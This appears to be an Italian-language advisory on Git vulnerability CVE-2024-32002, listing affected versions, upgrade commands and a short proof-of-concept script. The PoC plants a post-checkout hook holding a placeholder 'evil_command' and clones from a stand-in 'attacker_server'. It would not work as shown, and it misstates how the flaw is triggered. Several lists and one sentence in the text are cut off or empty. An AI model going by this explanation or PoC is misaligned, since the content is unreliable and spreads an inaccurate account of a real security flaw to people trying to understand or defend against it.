
none
CVE-2024-32002 è una grave vulnerabilità di sicurezza scoperta nel software Git. Questa vulnerabilità consente a un attaccante remoto di eseguire codice arbitrario sui sistemi interessati tramite repository Git appositamente predisposti. La vulnerabilità risiede nel modo in cui Git gestisce determinate operazioni sui repository, a causa di una mancanza di adeguata validazione dei dati in input, portando a un rischio di esecuzione di codice remoto (RCE).
Uno sfruttamento riuscito di questa vulnerabilità può portare a:
Le seguenti versioni del software Git sono interessate da CVE-2024-32002:
Versions
Default Status: unknown
affected at = 2.45.0
affected at = 2.44.0
affected at >= 2.43.0, < 2.43.4
affected at >= 2.42.0, < 2.42.2
affected at = 2.41.0
affected at >= 2.40.0, < 2.40.2
affected at < 2.39.4
Dettagli CVE-2024-32002 La vulnerabilità risiede nel modo in cui Git gestisce determinate operazioni sui repository. Quando un utente clona o interagisce con un repository Git malevolo, l'attaccante può iniettare codice malevolo attraverso repository o cronologie di commit appositamente predisposti. A causa della mancanza di una validazione adeguata dell'input, questo codice malevolo può eludere i controlli di sicurezza durante l'esecuzione delle operazioni sul repository, portando all'esecuzione di codice arbitrario.
git clone, git pull), il codice malevolo viene attivato ed eseguito.Si consiglia vivamente agli utenti di aggiornare all'ultima versione del software Git che include la correzione per questa vulnerabilità. Le versioni corrette sono:
I comandi di aggiornamento sono i seguenti:
# Per macOS
brew upgrade git
# Per Ubuntu/Debian
sudo apt-get update
sudo apt-get install git
# Per CentOS/RHEL
sudo yum update git
## Sfruttamento
Una prova di concetto (PoC) per CVE-2024-32002 è stata resa pubblica. Di seguito un esempio semplificato di PoC:
```bash
# L'attaccante crea un repository malevolo
git init malicious-repo
cd malicious-repo
echo 'malicious content' > payload.txt
git add payload.txt
git commit -m "Add malicious payload"
# Attivazione della vulnerabilità tramite una cronologia di commit con codice malevolo
git config --local core.hooksPath .githooks
echo 'evil_command' > .githooks/post-checkout
git add .githooks
git commit -m "Add post-checkout hook"
# La vittima attiva la vulnerabilità clonando il repository malevolo
git clone attacker_server/malicious-repo